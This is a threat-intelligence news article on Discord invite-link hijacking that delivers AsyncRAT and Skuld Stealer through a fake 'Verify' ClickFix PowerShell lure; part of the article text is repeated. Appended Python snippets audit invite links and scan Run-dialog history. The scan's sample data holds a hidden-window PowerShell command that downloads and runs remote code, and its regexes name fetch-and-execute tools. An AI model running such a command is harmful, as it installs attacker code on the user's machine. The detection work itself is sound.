    The other payload is a Golang information stealer that's downloaded from Bitbucket. It's equipped to steal sensitive user data from Discord, various browsers, crypto wallets, and gaming platforms.
    Skuld is also capable of harvesting crypto wallet seed phrases and passwords from the Exodus and Atomic crypto wallets. It accomplishes this using an approach called wallet injection that replaces legitimate application files with trojanized versions downloaded from GitHub. It's worth noting that a similar technique was recently put to use by a rogue npm package named pdf-to-office.
    The attack also employs a custom version of an open-source tool known as ChromeKatz to bypass Chrome's app-bound encryption protections. The collected data is exfiltrated to the miscreants via a Discord webhook.
    The fact that payload delivery and data exfiltration occur via trusted cloud services such as GitHub, Bitbucket, Pastebin, and Discord allows the threat actors to blend in with normal traffic and fly under the radar. Discord has since disabled the malicious bot, effectively breaking the attack chain.

    Check Point said it also identified another campaign mounted by the same threat actor that distributes the loader as a modified version of a hacktool for unlocking pirated games. The malicious program, also hosted on Bitbucket, has been downloaded 350 times.
    It has been assessed that the victims of these campaigns are primarily located in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom.
    The findings represent the latest example of how cybercriminals are targeting the popular social platform, which has had its content delivery network (CDN) abused to host malware in the past.
    "This campaign illustrates how a subtle feature of Discord's invite system, the ability to reuse expired or deleted invite codes in vanity invite links, can be exploited as a powerful attack vector," the researchers said. "By hijacking legitimate invite links, threat actors silently redirect unsuspecting users to malicious Discord servers."
    "The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain."

    THEHACKERNEWS.COM
    Discord Invite Link Hijacking Delivers AsyncRAT and Skuld Stealer Targeting Crypto Wallets
    Jun 14, 2025Ravie LakshmananMalware / Threat Intelligence A new malware campaign is exploiting a weakness in Discord's invitation system to deliver an information stealer called Skuld and the AsyncRAT remote access trojan. "Attackers hijacked the links through vanity link registration, allowing them to silently redirect users from trusted sources to malicious servers," Check Point said in a technical report. "The attackers combined the ClickFix phishing technique, multi-stage loaders, and time-based evasions to stealthily deliver AsyncRAT, and a customized Skuld Stealer targeting crypto wallets." The issue with Discord's invite mechanism is that it allows attackers to hijack expired or deleted invite links and secretly redirect unsuspecting users to malicious servers under their control. This also means that a Discord invite link that was once trusted and shared on forums or social media platforms could unwittingly lead users to malicious sites. Details of the campaign come a little over a month after the cybersecurity company revealed another sophisticated phishing campaign that hijacked expired vanity invite links to entice users into joining a Discord server and instruct them to visit a phishing site to verify ownership, only to have their digital assets drained upon connecting their wallets. While users can create temporary, permanent, or custom (vanity) invite links on Discord, the platform prevents other legitimate servers from reclaiming a previously expired or deleted invite. However, Check Point found that creating custom invite links allows the reuse of expired invite codes and even deleted permanent invite codes in some cases. This ability to reuse Discord expired or deleted codes when creating custom vanity invite links opens the door to abuse, allowing attackers to claim it for their malicious server. 
"This creates a serious risk: Users who follow previously trusted invite links (e.g., on websites, blogs, or forums) can unknowingly be redirected to fake Discord servers created by threat actors," Check Point said. The Discord invite-link hijacking, in a nutshell, involves taking control of invite links originally shared by legitimate communities and then using them to redirect users to the malicious server. Users who fall prey to the scheme and join the server are asked to complete a verification step in order to gain full server access by authorizing a bot, which then leads them to a fake website with a prominent "Verify" button. This is where the attackers take the attack to the next level by incorporating the infamous ClickFix social engineering tactic to trick users into infecting their systems under the pretext of verification. Specifically, clicking the "Verify" button surreptitiously executes JavaScript that copies a PowerShell command to the machine's clipboard, after which the users are urged to launch the Windows Run dialog, paste the already copied "verification string" (i.e., the PowerShell command), and press Enter to authenticate their accounts. But in reality, performing these steps triggers the download of a PowerShell script hosted on Pastebin that subsequently retrieves and executes a first-stage downloader, which is ultimately used to drop AsyncRAT and Skuld Stealer from a remote server and execute them. At the heart of this attack lies a meticulously engineered, multi-stage infection process designed for both precision and stealth, while also taking steps to subvert security protections through sandbox security checks. AsyncRAT, which offers comprehensive remote control capabilities over infected systems, has been found to employ a technique called dead drop resolver to access the actual command-and-control (C2) server by reading a Pastebin file. The other payload is a Golang information stealer that's downloaded from Bitbucket. 
It's equipped to steal sensitive user data from Discord, various browsers, crypto wallets, and gaming platforms. Skuld is also capable of harvesting crypto wallet seed phrases and passwords from the Exodus and Atomic crypto wallets. It accomplishes this using an approach called wallet injection that replaces legitimate application files with trojanized versions downloaded from GitHub. It's worth noting that a similar technique was recently put to use by a rogue npm package named pdf-to-office. The attack also employs a custom version of an open-source tool known as ChromeKatz to bypass Chrome's app-bound encryption protections. The collected data is exfiltrated to the miscreants via a Discord webhook. The fact that payload delivery and data exfiltration occur via trusted cloud services such as GitHub, Bitbucket, Pastebin, and Discord allows the threat actors to blend in with normal traffic and fly under the radar. Discord has since disabled the malicious bot, effectively breaking the attack chain. Check Point said it also identified another campaign mounted by the same threat actor that distributes the loader as a modified version of a hacktool for unlocking pirated games. The malicious program, also hosted on Bitbucket, has been downloaded 350 times. It has been assessed that the victims of these campaigns are primarily located in the United States, Vietnam, France, Germany, Slovakia, Austria, the Netherlands, and the United Kingdom. The findings represent the latest example of how cybercriminals are targeting the popular social platform, which has had its content delivery network (CDN) abused to host malware in the past. "This campaign illustrates how a subtle feature of Discord's invite system, the ability to reuse expired or deleted invite codes in vanity invite links, can be exploited as a powerful attack vector," the researchers said. "By hijacking legitimate invite links, threat actors silently redirect unsuspecting users to malicious Discord servers." 
"The choice of payloads, including a powerful stealer specifically targeting cryptocurrency wallets, suggests that the attackers are primarily focused on crypto users and motivated by financial gain." Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. SHARE    
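For site owners who publish Discord invites, the reuse of expired or deleted codes described above can be caught by pinning each published link to the server ID it is supposed to reach and re-checking it periodically. The audit below is an added example, not code from the article or from Check Point; the lookup results are constructed, and the `guild.id` and `expires_at` field names are assumed to follow Discord's public invite object.

```python
import re

INVITE_RE = re.compile(
    r"(?:https?://)?(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)",
    re.I,
)

# Constructed data: links published on your own pages -> the guild ID you expect.
SAMPLE_PUBLISHED = {
    "https://discord.gg/community": "111111111111111111",
    "https://discord.com/invite/AbC123xy": "111111111111111111",
    "https://discord.gg/oldevent": "111111111111111111",
    "https://discord.gg/beta2024": "111111111111111111",
}
# Constructed lookup results per invite code; None means the code no longer resolves.
SAMPLE_LOOKUPS = {
    "community": {"guild": {"id": "111111111111111111"}, "expires_at": None},
    "AbC123xy": {"guild": {"id": "111111111111111111"},
                 "expires_at": "2025-07-01T00:00:00+00:00"},
    "oldevent": {"guild": {"id": "999999999999999999"}, "expires_at": None},
    "beta2024": None,
}


def invite_code(url):
    """Extract the invite code from a discord.gg or discord.com/invite URL."""
    match = INVITE_RE.search(url)
    return match.group(1) if match else None


def audit(published, lookups):
    """Return {url: status} for every published invite link."""
    report = {}
    for url, expected_guild in published.items():
        code = invite_code(url)
        invite = lookups.get(code)
        if code is None:
            status = "not-an-invite"
        elif invite is None:
            status = "dead"      # unclaimed code: remove the link before someone reuses it
        elif invite["guild"]["id"] != expected_guild:
            status = "mismatch"  # the link now leads to a different server
        elif invite.get("expires_at"):
            status = "expiring"  # temporary invite that will lapse while still published
        else:
            status = "ok"
        report[url] = status
    return report
```

Anything other than `ok` is a reason to pull or replace the published link.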
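On the response side, the ClickFix step in the article leaves a trace: Windows records commands entered in the Run dialog under the per-user RunMRU registry key. The triage below is an added example, not taken from the article or from Check Point's report; the exported entries, the paste ID placeholder and the heuristics are constructed for illustration.

```python
import re

# Constructed export of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
# (value name -> data). The paste ID is a placeholder, not a real indicator.
SAMPLE_RUNMRU = {
    "MRUList": "cab",  # most recent entry first
    "a": "cmd\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "iex (iwr https://pastebin.com/raw/PLACEHOLDER)"\\1',
}

# Heuristics chosen for this example; tune them to your environment.
CHECKS = [
    ("interpreter", re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I)),
    ("remote fetch", re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|bitsadmin)\b", re.I)),
    ("in-memory execution", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    ("hidden window", re.compile(r"-w(in(dowstyle)?)?\s+(h(idden)?|1)\b", re.I)),
    ("url", re.compile(r"https?://[^\s\"')]+", re.I)),
    ("code or paste host", re.compile(
        r"https?://([\w.-]+\.)?(pastebin\.com|bitbucket\.org|github\.com|githubusercontent\.com)/",
        re.I)),
]


def run_history(runmru):
    """Return Run-dialog commands, most recent first, without the trailing '\\1'."""
    commands = []
    for name in runmru.get("MRUList", ""):
        data = runmru.get(name)
        if data is not None:
            commands.append(data[:-2] if data.endswith("\\1") else data)
    return commands


def triage(runmru):
    """Flag entries that start an interpreter and also reference remote content."""
    findings = []
    for cmd in run_history(runmru):
        hits = [label for label, rx in CHECKS if rx.search(cmd)]
        if "interpreter" in hits and ("remote fetch" in hits or "url" in hits):
            findings.append((cmd, hits))
    return findings


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_RUNMRU):
        print(f"SUSPICIOUS: {cmd}\n  reasons: {', '.join(hits)}")
```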